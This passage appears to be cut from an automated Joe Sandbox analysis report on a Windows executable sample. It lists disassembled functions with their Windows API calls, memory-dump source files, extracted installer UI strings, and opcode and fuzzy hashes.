                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000,?,?), ref: 00507B4B
                                                    • CloseHandle.KERNEL32(00000000), ref: 00507B5A
                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 00507B64
                                                    • CloseHandle.KERNEL32(?), ref: 00507B95
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: CloseHandle$CreateErrorFileLast
                                                    • String ID: NUMBER_OF_PROCESSORS$TQ]
                                                    • API String ID: 3884794734-4021308933
                                                    • Opcode ID: f424b215f324f5a1ae98291adbda16c2287a8bfa916bd42956c8b3297edd3170
                                                    • Instruction ID: f84159eb72b536ccffd8ece040a57c9419077d56ccff42dd0a621ca857e18e46
                                                    • Opcode Fuzzy Hash: f424b215f324f5a1ae98291adbda16c2287a8bfa916bd42956c8b3297edd3170
                                                    • Instruction Fuzzy Hash: DC127B70D04259DFDF10CFA8D888BAEBFF1BF08314F1481A9E415AB291D775AA49CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000037), ref: 0044C6D9
                                                    • SendMessageW.USER32(?,00000443,00000000), ref: 0044C743
                                                    • MulDiv.KERNEL32(?,00000000), ref: 0044C77A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow
                                                    • String ID: NumberValidationTipMsg$NumberValidationTipTitle$Segoe UI
                                                    • API String ID: 701072176-2319862951
                                                    • Opcode ID: 54c819792b94e94b1582a1a47049426f724f091346dd9218b5d108b8931d4250
                                                    • Instruction ID: 9a461ba4fc3ef8a1d4e688d895fedee5f6b917e25c4145fd5d0b11e078c1aedb
                                                    • Opcode Fuzzy Hash: 54c819792b94e94b1582a1a47049426f724f091346dd9218b5d108b8931d4250
                                                    • Instruction Fuzzy Hash: 73D1DF71A00605AFEB14CF74CC85BEEBBB1FF89300F108659E556A72D1DB74AA49CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • _wcsrchr.LIBVCRUNTIME ref: 0046C098
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • FindFirstFileW.KERNEL32(?,00000000,?,?,00000011), ref: 0046C198
                                                    • FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000,?,?,00000011), ref: 0046C235
                                                    • FindClose.KERNEL32(00000000,?,00000000,?,?,00000011), ref: 0046C25B
                                                    • FindClose.KERNEL32(00000000,?,00000000,?,?,00000011), ref: 0046C2A5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess_wcsrchr
                                                    • String ID: p2[
                                                    • API String ID: 352340201-3128520015
                                                    • Opcode ID: f9ef12ee2f81084685bfa460e763ec8d74824377ec522742cc66ee3700b4702e
                                                    • Instruction ID: f1785292d09c87c31394ecd80c50c9a3690babe5314f1eb05cccea09df358fe8
                                                    • Opcode Fuzzy Hash: f9ef12ee2f81084685bfa460e763ec8d74824377ec522742cc66ee3700b4702e
                                                    • Instruction Fuzzy Hash: 5A71D271A00209DFDB10DFA8CC98BBBBBF4FF45324F10825AE8559B281E77999048B56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: __floor_pentium4
                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                    • API String ID: 4168288129-2761157908
                                                    • Opcode ID: b9b69c4b55da9c84b7c46a6a30e469ab6252831b69d841d17a398315086a83f6
                                                    • Instruction ID: 10587fd77abd9b9c9399d0195bbc372a16b1b2df625c7a5ed04ec1786fe22266
                                                    • Opcode Fuzzy Hash: b9b69c4b55da9c84b7c46a6a30e469ab6252831b69d841d17a398315086a83f6
                                                    • Instruction Fuzzy Hash: C2D23971E082298FDB25CE28DC447EABBB5FB45309F1445EAD44DE7250EB78AE858F40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,00000000,-00000010,?,D13B3340,?,00000000,00000000), ref: 004B0991
                                                    • FindNextFileW.KERNEL32(?,00000000), ref: 004B09AC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: FileFind$FirstNext
                                                    • String ID:
                                                    • API String ID: 1690352074-0
                                                    • Opcode ID: 1a91939d29f23013f1377293e1c97883e16630ed9f74b4b831460180709d54b0
                                                    • Instruction ID: 2ab1fe8e16d12f292499d4c6729ff5ad2be420a5a74abf2ad87a43a3f3dee4a3
                                                    • Opcode Fuzzy Hash: 1a91939d29f23013f1377293e1c97883e16630ed9f74b4b831460180709d54b0
                                                    • Instruction Fuzzy Hash: EE71AD71901649DFDB10DFA8CC48AEEBBB8FF04315F148269E815AB291DB349E08CB65
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(0000000C,0051F8C3,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9A9
                                                    • GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9D0
                                                    • HeapAlloc.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9D7
                                                    • InitializeSListHead.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9E4
                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051F9F9
                                                    • HeapFree.KERNEL32(00000000,?,0051FA5B,?,?,?,?,?,?,?), ref: 0051FA00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
                                                    • String ID:
                                                    • API String ID: 1475849761-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID: Init_thread_footer
                                                    • String ID: AI_EXIST_INSTANCES$AI_EXIST_NEW_INSTANCES$MultipleInstances$MultipleInstancesProps$PropertyValue
                                                    • API String ID: 1385522511-2308371840
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Similarity
                                                    • API ID: _strrchr
                                                    • String ID:
                                                    • API String ID: 3213747228-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
                                                    • API String ID: 0-932585912
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,00000000,?), ref: 0049D28C
                                                    • FindClose.KERNEL32(00000000), ref: 0049D3D7
                                                      • Part of subcall function 0035A850: RtlAllocateHeap.NTDLL(?,00000000,?,D13B3340,00000000,00547F70,000000FF,?,?,0062EFDC,?,004AC2E8,80004005,D13B3340,?,?), ref: 0035A89A
                                                    Strings
                                                    Similarity
                                                    • API ID: Find$AllocateCloseFileFirstHeap
                                                    • String ID: %d.%d.%d.%d
                                                    • API String ID: 1673784098-3491811756
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: <> "$ = "$Hide$Show
                                                    • API String ID: 0-289022205
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                      • Part of subcall function 0035AB90: GetProcessHeap.KERNEL32 ref: 0035ABE5
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035AC17
                                                      • Part of subcall function 0035AB90: __Init_thread_footer.LIBCMT ref: 0035ACA2
                                                    • GetLocaleInfoW.KERNEL32(?,00000002,005B329C,00000000), ref: 00495A81
                                                    • GetLocaleInfoW.KERNEL32(?,00000002,00495605,-00000001,00000078,-00000001), ref: 00495ABD
                                                    Strings
                                                    Similarity
                                                    • API ID: InfoInit_thread_footerLocale$HeapProcess
                                                    • String ID: %d-%s
                                                    • API String ID: 1688948774-1781338863
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVersionExW.KERNEL32 ref: 005199C8
                                                    • GetVersionExW.KERNEL32(?), ref: 00519A13
                                                    • IsProcessorFeaturePresent.KERNEL32(00000011), ref: 00519A27
                                                    Similarity
                                                    • API ID: Version$FeaturePresentProcessor
                                                    • String ID:
                                                    • API String ID: 1871528217-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,D13B3340,?), ref: 004514DC
                                                    • FindNextFileW.KERNEL32(000000FF,00000010,?,D13B3340,?), ref: 00451633
                                                    • FindClose.KERNEL32(000000FF,?,?,D13B3340,?), ref: 00451692
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsWindow.USER32(00000004), ref: 0036F02E
                                                    • GetWindowLongW.USER32(00000004,000000FC), ref: 0036F047
                                                    • SetWindowLongW.USER32(00000004,000000FC,?), ref: 0036F059
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID:
                                                    • API String ID: 847901565-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(00000003,000000FC), ref: 00372CE6
                                                    • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00372CF8
                                                    • DeleteCriticalSection.KERNEL32(?,D13B3340,?,?,?,?,0054D5E4,000000FF), ref: 00372D23
                                                    Similarity
                                                    • API ID: LongWindow$CriticalDeleteSection
                                                    • String ID:
                                                    • API String ID: 1978754570-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005251EB
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005251F5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00525202
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LoadResource.KERNEL32(00000000,00000000,D13B3340,00000001,00000000,?,00000000,00547D20,000000FF,?,00359FAC,D13B3340,?,?,000000A0,?), ref: 0035A02B
                                                    • LockResource.KERNEL32(00000000,?,00359FAC,D13B3340,?,?,000000A0,?,A0BA0035,005483F0,000000FF,?,0035A150,?,?,000000A0), ref: 0035A036
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00359FAC,D13B3340,?,?,000000A0,?,A0BA0035,005483F0,000000FF,?,0035A150,?,?), ref: 0035A044
                                                    Similarity
                                                    • API ID: Resource$LoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 2853612939-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(0000001B,000000FC), ref: 00367B69
                                                    • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00367B77
                                                    • DestroyWindow.USER32(0000001B), ref: 00367BA3
                                                    Similarity
                                                    • API ID: Window$Long$Destroy
                                                    • String ID:
                                                    • API String ID: 3055081903-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 0037FB1B
                                                    • SendMessageW.USER32(?,0000102B,?,-00000002), ref: 0037FD05
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 003C410F
                                                    • SetWindowLongW.USER32(00000000,000000FC,?), ref: 003C411D
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,D13B3340,?,00000000,00000000,00000000,005882FD,000000FF), ref: 0046E2D8
                                                    • FindClose.KERNEL32(00000000,?,D13B3340,?,00000000,00000000,00000000,005882FD,000000FF), ref: 0046E322
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • __set_se_translator.LIBVCRUNTIME ref: 0038DA25
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0011B960), ref: 0038DA3B
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled__set_se_translator
                                                    • String ID:
                                                    • API String ID: 2480343447-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: T$\$|$\
                                                    • API String ID: 0-3399885332
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID: ExceptionRaise__floor_pentium4
                                                    • String ID: unordered_map/set too long
                                                    • API String ID: 996205981-306623848
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,003769C7,?,?,?,?,?,?,?,?,00376838,?,?), ref: 003782C0
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \[
                                                    • API String ID: 0-243666616
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d7be8a75a403495be592ab5eec0968c97b00952965cd856fd8e90f32d4fc012c
                                                    • Instruction ID: f1276578d31832edcd9ee17b6267adb04ccfeb44ffd56ca5831cb623fab30097
                                                    • Opcode Fuzzy Hash: d7be8a75a403495be592ab5eec0968c97b00952965cd856fd8e90f32d4fc012c
                                                    • Instruction Fuzzy Hash: 10C1CF309026668FCB28CFA8E49467ABFA1FF57310F684A19D492973D1CF31AC46CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3d30655d3cb1d7661b2d723cfc71ae6a9df24c20fd5c6d86490fc99799677374
                                                    • Instruction ID: bccb1647b3fa8c55b7c06a0fc6f2ca04ad9063e4ef437e53fe7750e659034674
                                                    • Opcode Fuzzy Hash: 3d30655d3cb1d7661b2d723cfc71ae6a9df24c20fd5c6d86490fc99799677374
                                                    • Instruction Fuzzy Hash: E97107B1801B48CFE761CF78C94478ABBF0BB05324F148A5DD4A99B3D1D3B9A608CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 061dc358492418f98eed4bc354e5c4725e7ee053de0c910e8cc351d4a7dc5dcf
                                                    • Instruction ID: e01d174825f7d50576b9a3d93ca7f6aa6c4a375a6881ccaf042466950bd93a82
                                                    • Opcode Fuzzy Hash: 061dc358492418f98eed4bc354e5c4725e7ee053de0c910e8cc351d4a7dc5dcf
                                                    • Instruction Fuzzy Hash: 4F215BB1804B88CFD710CF68C90478ABFF4FB09318F11869ED4559B791E7B5AA44CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 903b3a4479bc25b4263cd06491b9c03484b1c11cd36dd2034f03ac28d4746290
                                                    • Instruction ID: 62d8b9882614215e56ace5145655e41aee7919de1ba45d6ae72abf33ccd922b6
                                                    • Opcode Fuzzy Hash: 903b3a4479bc25b4263cd06491b9c03484b1c11cd36dd2034f03ac28d4746290
                                                    • Instruction Fuzzy Hash: 452149B1804788CFD710CF68C94478ABBF4FB0A314F11869ED4559B791E7B5AA04CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f0866fea2c0c0d676fdd498255391d95e4fe85f2c09373f032c99e64a20d5d3e
                                                    • Instruction ID: fb166dc2c5b8e1af0e14518e37fe1fb15b4070ef2a30784daef2d962331404c8
                                                    • Opcode Fuzzy Hash: f0866fea2c0c0d676fdd498255391d95e4fe85f2c09373f032c99e64a20d5d3e
                                                    • Instruction Fuzzy Hash: BDF03932A11324AFCB26CB48D81AA99B7A9EB85B61F11409AF541EB251C7B0DE00C7C1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                    • Instruction ID: 36261759a45d5ddd274d2b38335dd9100c6415b5f8e734ac3066fdc3082ef8ae
                                                    • Opcode Fuzzy Hash: 52a31a1b2c87d20f6f1ccd6e3f5e56cdbfee1b29986efbea090f4dac1cf3a30c
                                                    • Instruction Fuzzy Hash: E5E04672915228EBCB14DBAC895898AF7BCFB85B00F110496B541D3200C2B0DE00C7D0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                    • Instruction ID: ce01fb6047ad7f0641107275164497ea547bc22bfaee1ed57f01d0052cd854ce
                                                    • Opcode Fuzzy Hash: 16a962eb7063aa5dac9a286c1eb4be0eb6ad47394398426903ba7e2235a18e8e
                                                    • Instruction Fuzzy Hash: 77C08C342009904BDE29891893B23A67794BBD3782F80048CC9020F683FB1EDC82D711
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Strings
